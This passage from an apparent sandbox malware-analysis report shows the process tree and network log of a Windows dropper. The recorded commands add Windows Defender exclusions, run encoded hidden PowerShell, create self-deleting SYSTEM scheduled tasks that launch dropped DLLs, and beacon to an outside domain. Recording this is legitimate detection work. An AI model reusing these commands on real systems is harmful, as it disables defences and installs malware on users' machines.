                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3364
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:1376
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:2916
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2928
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:2008
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:1236
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:2216
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:4608
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:648
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:2544
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2964
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:1868
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4064
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:2552
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:2196
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3828
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1460
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1064
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4576
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2792
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "gYksPEqYp" /SC once /ST 00:03:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:1628
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "gYksPEqYp"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1136
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /DELETE /F /TN "gYksPEqYp"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3836
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 00:05:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe\" 7d /Ysrcdidqp 525403 /S" /V1 /F
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:5056
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1708
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                          1⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3544
                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2804
                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4020
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2160
                                                                                                                                                              • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1960
                                                                                                                                                                • C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe
                                                                                                                                                                  C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe 7d /Ysrcdidqp 525403 /S
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5064
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2592
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2208
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2204
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3388
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2588
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1596
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3068
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4612
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3876
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1556
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3496
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2784
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:3860
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4332
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:4040
                                                                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:4868
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2312
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2032
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3080
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3856
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2648
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\bMbSMy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:3500
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\acexVhh.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /END /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3920
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2068
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\NpeMHAw.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:4164
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\wPXELrG.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:2228
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXbwydK.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:1536
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\XnyNHtr.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:2776
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 00:01:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll\",#1 /zLkdidL 525403" /V1 /F
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:4380
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /run /I /tn "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:204
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:424
                                                                                                                                                                                                                • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll",#1 /zLkdidL 525403
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3544
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll",#1 /zLkdidL 525403
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      PID:1592
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:216

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      54.210.117.250
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      54.210.117.250:443
                                                                                                                                                                                                                      Request
